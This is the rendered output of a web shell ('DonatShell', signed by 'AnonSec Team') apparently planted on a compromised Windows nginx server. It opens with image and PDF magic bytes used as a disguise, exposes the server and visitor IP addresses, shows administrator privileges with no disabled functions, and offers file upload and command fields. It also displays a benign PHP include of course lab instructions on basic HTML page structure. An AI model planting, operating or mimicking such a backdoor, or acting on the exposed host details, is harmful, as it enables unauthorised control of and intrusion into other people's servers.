GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/CST1146/Labs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/CST1146/Labs/LabNotes.phpinc
<fieldset id="notes"><legend>Notes:</legend>
	<div>
		HTML code is displayed <span class="html">with this background-color and text color</span>.
		<br>
		PHP code is displayed <span class="php">with this background-color and text color</span>.
		<? if ( $evaluationNumber < 7 ) { ?>
		<br>
		<b>We will be using the following in every php page throughout this class:</b>
		<ol>
			<li>A php variable named <php>$labNumber</php> equal to the current lab number: <b class=copyText><?=$evaluationNumber?></b>.</li>
			<li>A php variable named <php>$myName</php> equal to your name: <b class=copyText><?=$userFullName?></b>.</li>
			<li>The HTML 5 DOCTYPE: <span class="html copyText">&lt;!DOCTYPE html&gt;</span>.</li>
			<li>An html tag with the <span class="highATT">lang</span>  attribute set to <span class="highVAL">en</span>: <span class="html copyText">&lt;html lang="en"&gt;</span>.</li>
			<li>A <span class="html">head</span> section containing:
				<ol style="list-style-type: lower-roman">
					<li>A <span class="html">title</span> element with a title of <span class="html">Lab <note>$labNumber</note> - <note>$myName</note></span>.
						<br><span class="note">Where <span class="html"><note>$labNumber</note></span> and <span class="html"><note>$myName</note></span> are replaced by the output of those variable values.
						e.g. Lab <?=$evaluationNumber?> - <?=$userFullName?></span></li>
					<li>A meta tag that defines the character set <span class="html copyText">&lt;meta charset="utf-8"&gt;</span>.</li>
				</ol>
			</li>
			<li>A <span class="html">body</span> section containing:
				<ol style="list-style-type: lower-roman">
					<li>An <span class="html">h1</span> heading with the same content as the title above.</li>
					<li><span class="note normal bold">Additional <span class="html">html</span> and <span class="php">php</span> code will be in the body section under this heading.</span></li>
				</ol>
			</li>
			<li>The stop html tag: <span class="html">&lt;/html&gt;</span>.</li>
		</ol>
		<? } ?>
	</div>
</fieldset>

Anon7 - 2022
AnonSec Team